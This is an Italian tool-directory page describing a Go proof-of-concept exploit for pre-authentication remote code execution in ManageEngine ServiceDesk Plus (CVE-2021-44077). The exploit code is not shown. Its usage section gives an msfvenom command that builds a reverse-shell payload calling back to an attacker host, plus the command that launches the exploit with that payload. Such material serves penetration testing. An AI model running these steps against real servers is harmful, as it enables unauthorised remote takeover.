Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Golang-CVE-2021-44077-POC — Exploit Proof of Concept in Golang per CVE-2021-44077: RCE pre-autenticazione in ManageEngine ServiceDesk Plus < 11306 | Kitploit
Strumenti/GitHubGitHub/pizza-power/golang-cve-2021-44077-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHubpizza-power/golang-cve-2021-44077-poc

Golang-CVE-2021-44077-POC

Exploit Proof of Concept in Golang per CVE-2021-44077: RCE pre-autenticazione in ManageEngine ServiceDesk Plus < 11306

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
23 anni faNon ancora revisionato

Golang-CVE-2021-44077-POC

Questo exploit è una RCE non autenticata in Zoho ManageEngine ServiceDesk Plus < 11306.

Puoi trovare una versione vulnerabile del software qui: http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe

Non sono riuscito a trovare una versione Golang di questo, quindi eccola qui. Il mio codice non è eccezionale, quindi procedi a tuo rischio e pericolo.

Post del blog:

https://www.pizzapower.me/2022/09/29/golang-proof-of-concept-exploit-for-cve-2021-44077-preauth-rce-in-manageengine-servicedesk-plus-11306/

Esecuzione

Crea un payload dannoso nella tua directory corrente.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe

Poi, esegui l'exploit.

go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"

-u è l'URL vulnerabile -f è il tuo file dannoso

Scarica lo strumento